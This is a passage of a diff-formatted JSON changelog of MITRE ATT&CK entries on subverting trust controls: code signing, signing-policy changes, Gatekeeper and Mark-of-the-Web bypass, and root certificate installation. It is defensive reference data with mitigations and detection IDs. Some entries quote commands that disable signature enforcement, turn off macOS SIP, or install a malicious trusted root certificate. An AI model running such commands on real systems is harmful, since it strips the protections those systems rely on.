+                            "url": "https://adsecurity.org/?p=1515"
+                        },
+                        {
+                            "source_name": "Microsoft Kerberos Golden Ticket",
+                            "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.",
+                            "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285"
+                        },
+                        {
+                            "source_name": "Microsoft Klist",
+                            "description": "Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.",
+                            "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/klist"
+                        },
+                        {
+                            "source_name": "ADSecurity Kerberos Ring Decoder",
+                            "description": "Sean Metcalf. (2014, September 12). Kerberos, Active Directory\u2019s Secret Decoder Ring. Retrieved February 27, 2020.",
+                            "url": "https://adsecurity.org/?p=227"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tim (Wadhwa-)Brown",
+                        "Cody Thomas, SpecterOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:41.885000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1015: Active Directory Configuration",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1043: Credential Access Protection",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0522: Detect Kerberos Ticket Theft or Forgery (T1558)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 14:54:07.588000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Subvert Trust Controls",
+                    "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553",
+                            "external_id": "T1553"
+                        },
+                        {
+                            "source_name": "SpectorOps Subverting Trust Sept 2017",
+                            "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.",
+                            "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"
+                        },
+                        {
+                            "source_name": "Securelist Digital Certificates",
+                            "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.",
+                            "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"
+                        },
+                        {
+                            "source_name": "Symantec Digital Certificates",
+                            "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.",
+                            "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-16 20:07:53.101000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1024: Restrict Registry Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1038: Execution Prevention",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0452: Detect Subversion of Trust Controls via Certificate, Registry, and Attribute Manipulation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 16:27:37.784000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Code Signing",
+                    "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553/002",
+                            "external_id": "T1553.002"
+                        },
+                        {
+                            "source_name": "EclecticLightChecksonEXECodeSigning",
+                            "description": "Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.",
+                            "url": "https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/"
+                        },
+                        {
+                            "source_name": "Securelist Digital Certificates",
+                            "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.",
+                            "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"
+                        },
+                        {
+                            "source_name": "Symantec Digital Certificates",
+                            "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.",
+                            "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"
+                        },
+                        {
+                            "source_name": "Wikipedia Code Signing",
+                            "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.",
+                            "url": "https://en.wikipedia.org/wiki/Code_signing"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2026-04-16 20:07:53.093000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0230: Detect Suspicious or Malicious Code Signing Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-04-23 01:04:57.161000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Code Signing Policy Modification",
+                    "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553/006",
+                            "external_id": "T1553.006"
+                        },
+                        {
+                            "source_name": "Apple Disable SIP",
+                            "description": "Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.",
+                            "url": "https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection"
+                        },
+                        {
+                            "source_name": "F-Secure BlackEnergy 2014",
+                            "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
+                            "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf"
+                        },
+                        {
+                            "source_name": "FireEye HIKIT Rootkit Part 2",
+                            "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html"
+                        },
+                        {
+                            "source_name": "Microsoft Unsigned Driver Apr 2017",
+                            "description": "Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test"
+                        },
+                        {
+                            "source_name": "Microsoft DSE June 2017",
+                            "description": "Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN"
+                        },
+                        {
+                            "source_name": "Microsoft TESTSIGNING Feb 2021",
+                            "description": "Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option"
+                        },
+                        {
+                            "source_name": "Unit42 AcidBox June 2020",
+                            "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.",
+                            "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"
+                        },
+                        {
+                            "source_name": "GitHub Turla Driver Loader",
+                            "description": "TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.",
+                            "url": "https://github.com/hfiref0x/TDL"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Abel Morales, Exabeam"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-16 20:07:53.034000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1024: Restrict Registry Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1046: Boot Integrity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0523: Detect Code Signing Policy Modification (Windows & macOS)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 16:16:08.471000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Gatekeeper Bypass",
+                    "description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple\u2019s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute \u2013 Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing \u2013 Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an \u201cunauthorized app\u201d and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553/001",
+                            "external_id": "T1553.001"
+                        },
+                        {
+                            "source_name": "Application Bundle Manipulation Brandon Dalton",
+                            "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.",
+                            "url": "https://redcanary.com/blog/mac-application-bundles/"
+                        },
+                        {
+                            "source_name": "theevilbit gatekeeper bypass 2021",
+                            "description": "Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.",
+                            "url": "https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/"
+                        },
+                        {
+                            "source_name": "OceanLotus for OS X",
+                            "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.",
+                            "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"
+                        },
+                        {
+                            "source_name": "TheEclecticLightCompany Quarantine and the flag",
+                            "description": "hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.",
+                            "url": "https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/"
+                        },
+                        {
+                            "source_name": "TheEclecticLightCompany apple notarization ",
+                            "description": "How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.",
+                            "url": "https://eclecticlight.co/2020/08/28/how-notarization-works/"
+                        },
+                        {
+                            "source_name": "20 macOS Common Tools and Techniques",
+                            "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
+                            "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Brandon Dalton @PartyD0lphin",
+                        "Swasti Bhushan Deb, IBM India Pvt. Ltd."
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2026-04-16 20:07:52.996000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0288: Detect Gatekeeper Bypass via Quarantine Flag and Trust Control Manipulation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-21 21:05:32.844000+00:00",
+                    "modified": "2026-05-12 15:12:00.715000+00:00",
+                    "name": "Install Root Certificate",
+                    "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553/004",
+                            "external_id": "T1553.004"
+                        },
+                        {
+                            "source_name": "Operation Emmental",
+                            "description": "botconf eu. (2014, December 31). David Sancho - Finding Holes in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.",
+                            "url": "https://www.youtube.com/watch?v=gchKFumYHWc"
+                        },
+                        {
+                            "source_name": "SpectorOps Code Signing Dec 2017",
+                            "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.",
+                            "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"
+                        },
+                        {
+                            "source_name": "Kaspersky Superfish",
+                            "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.",
+                            "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/"
+                        },
+                        {
+                            "source_name": "objective-see ay mami 2018",
+                            "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.",
+                            "url": "https://objective-see.com/blog/blog_0x26.html"
+                        },
+                        {
+                            "source_name": "Wikipedia Root Certificate",
+                            "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Root_certificate"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Itzik Kotler, SafeBreach",
+                        "Matt Graeber, @mattifestation, SpecterOps",
+                        "Red Canary",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.715000+00:00\", \"old_value\": \"2026-04-16 20:07:52.931000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0056: Detection Strategy for Subvert Trust Controls via Install Root Certificate."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-02-22 14:20:31.650000+00:00",
+                    "modified": "2026-05-12 15:12:00.662000+00:00",
+                    "name": "Mark-of-the-Web Bypass",
+                    "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553/005",
+                            "external_id": "T1553.005"
+                        },
+                        {
+                            "source_name": "Beek Use of VHD Dec 2020",
+                            "description": "Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20201203131725/https://christiaanbeek.medium.com/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316"
+                        },
+                        {
+                            "source_name": "Outflank MotW 2020",
+                            "description": "Hegt, S. (2020, March 30). Mark-of-the-Web from a red team\u2019s perspective. Retrieved February 22, 2021.",
+                            "url": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/"
+                        },
+                        {
+                            "source_name": "Intezer Russian APT Dec 2020",
+                            "description": "Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.",
+                            "url": "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
+                        },
+                        {
+                            "source_name": "Microsoft Zone.Identifier 2020",
+                            "description": "Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8"
+                        }
+                    ],
+                    "object_marking_refs": [
